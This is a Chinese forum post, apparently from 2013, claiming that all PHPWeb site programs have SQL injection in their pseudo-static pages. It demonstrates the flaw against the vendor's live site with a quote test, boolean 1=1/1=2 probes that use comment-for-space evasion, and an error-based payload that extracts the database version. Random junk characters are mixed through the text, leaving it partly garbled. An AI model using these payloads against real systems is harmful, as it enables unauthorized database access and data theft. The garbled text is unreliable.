phpweb所有的整站程序伪静态页面都存在sql注入. O8 b, _$ Q7 t0 X r4 u
- j: ^6 D8 {* ~/ K3 ^
主站:http://phpweb.net/; M* N1 r' |' x' M: \* {# W
加’检测:# M4 Q: {& U: l+ |& N( e! n$ M& H
$ @) R3 m8 d8 o$ y0 A& G" w4 f
http://www.phpweb.net/down/html/?772′.html
8 M- |9 C$ P0 X& y 4 M4 o! W% w+ z# @* x& \ s4 V7 A, s
出错4 H$ s$ l2 N0 F3 {
存在注入。9 I+ A* q. c6 P7 H" c3 f; S
不能用空格,只能用/*罗
( m6 N+ b' I# Vhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
+ E5 b" X0 V0 Z1 D- q# O5 m 2 A, O8 T7 T" a6 V
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
s- g; M' d8 B3 Q6 x$ z爆数据库版本:
6 x# e; `4 O8 j+ Y, F5 ^. L& V
/ s& a% C$ B! B# L- k$ V5 ^+ c?$ { ~2 i# e& V: W. o
1
) f" I( f, N1 B2 R. o# g/ d8 Qhttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
1 o6 N# d8 B D* d' B更新日期: 2013-01-03 13:39:50
9 g7 F2 X) a1 Z- X$ s |
发表于 2013-1-4 19:46:42
收藏
支持
反对